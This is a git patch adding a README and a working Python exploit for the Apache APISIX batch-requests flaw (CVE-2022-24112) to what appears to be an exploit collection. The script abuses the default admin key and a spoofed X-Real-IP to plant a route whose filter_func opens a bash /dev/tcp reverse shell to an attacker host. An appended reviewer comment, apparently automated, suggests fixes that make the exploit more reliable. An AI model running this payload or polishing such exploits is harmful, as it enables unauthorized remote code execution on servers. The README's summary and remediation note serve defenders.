From b3a724b4e2bca4e5cf74b51f0fbc5dcbf3b4b552 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:32 +0000 Subject: [PATCH] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/cve-2022-24112/README.md | 21 +++++ .../2022/cve-2022-24112/apisix-exploit.py | 79 +++++++++++++++++++ 2 files changed, 100 insertions(+) create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/README.md create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/Apache-APISIX/2022/cve-2022-24112/README.md
new file mode 100644
index 00000000..c099b392
--- /dev/null
+++ b/cve/Apache-APISIX/2022/cve-2022-24112/README.md
@@ -0,0 +1,21 @@
+# Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit
+
+## Summary
+An attacker can abuse the batch-requests plugin to send requests to
+bypass the IP restriction of Admin API.
+A default configuration of Apache APISIX (with default API key) is
+vulnerable to remote code execution.
+When the admin key was changed or the port of Admin API was changed to
+a port different from the data panel, the impact is lower. But there
+is still a risk to bypass the IP restriction of Apache APISIX's data
+panel.
+
+There is a check in the batch-requests plugin which overrides the
+client IP with its real remote IP. But due to a bug in the code, this
+check can be bypassed.
+
+## Remediation
+upgrade to 2.10.4 or 2.12.1.
+
+
+
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
new file mode 100644
index 00000000..d8528165
--- /dev/null
+++ b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
@@ -0,0 +1,79 @@
+import requests
+import sys
+
+
+class color:
+ HEADER = '\033[95m'
+ IMPORTANT = '\33[35m'
+ NOTICE = '\033[33m'
+ OKBLUE = '\033[94m'
+ OKGREEN = '\033[92m'
+ WARNING = '\033[93m'
+ RED = '\033[91m'
+ END = '\033[0m'
+ UNDERLINE = '\033[4m'
+ LOGGING = '\33[34m'
+color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]
+
+
+def banner():
+ run = color_random[6]+'''\n . ,
+ _.._ * __*\./ ___ _ \./._ | _ *-+-
+ (_][_)|_) |/'\ (/,/'\[_)|(_)| |
+ | |
+\n'''
+ run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''
+ run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
+ print(run+run2+run3)
+
+if (len(sys.argv) != 4):
+ banner()
+ print("[!] Usage : ./apisix-exploit.py ")
+ exit()
+
+else:
+ banner()
+ target_url = sys.argv[1]
+ lhost = sys.argv[2]
+ lport = sys.argv[3]
+
+headers1 = {
+ 'Host': '127.0.0.1:8080',
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
+ 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+ 'Accept': '*/*',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/json',
+ 'Content-Length': '540',
+ 'Connection': 'close',
+}
+
+headers2 = {
+ 'Host': '127.0.0.1:8080',
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
+ 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+ 'Accept': '*/*',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/json',
+ 'Connection': 'close',
+}
+
+json_data = {
+ 'headers': {
+ 'X-Real-IP': '127.0.0.1',
+ 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+ 'Content-Type': 'application/json',
+ },
+ 'timeout': 1500,
+ 'pipeline': [
+ {
+ 'path': '/apisix/admin/routes/index',
+ 'method': 'PUT',
+ 'body': 
'{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}',
+ },
+ ],
+}
+
+response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)
+
+response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)
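Review bot: The request URLs are built by plain concatenation (`target_url+'apisix/batch-requests'` and `target_url+'rms/fzxewh'` at the end of the hunk), so a target passed without a trailing slash yields `http://host:9080apisix/batch-requests` and the exploit fails silently; normalise once where the argument is read, `target_url = sys.argv[1].rstrip('/') + '/'`. `headers1` also hard-codes `'Content-Length': '540'` although the body length varies with `lhost`/`lport`; as far as I can tell requests recomputes the header from the serialized `json=` payload, so the entry is dead at best and misleading at worst and should be dropped. Neither `response1` nor `response2` is inspected, so the operator cannot tell whether the route was actually created (200 versus 401/403 when the admin key is not the default) — print `response1.status_code` and `response1.text` before sending the trigger GET. Two engagement-hygiene points: the route `/rms/fzxewh` carrying the `filter_func` payload persists in the target's etcd after the run and should be removed with a matching `DELETE` through the same batch endpoint, and its upstream names a real third-party domain (`schmidt-schaefer.com`), so a matched request would presumably be proxied to a host outside the test scope — use an address you control or a non-routable one. The usage string on the `print("[!] Usage : ./apisix-exploit.py ")` line appears to have lost its argument placeholders and should spell out the three expected arguments (target URL, lhost, lport).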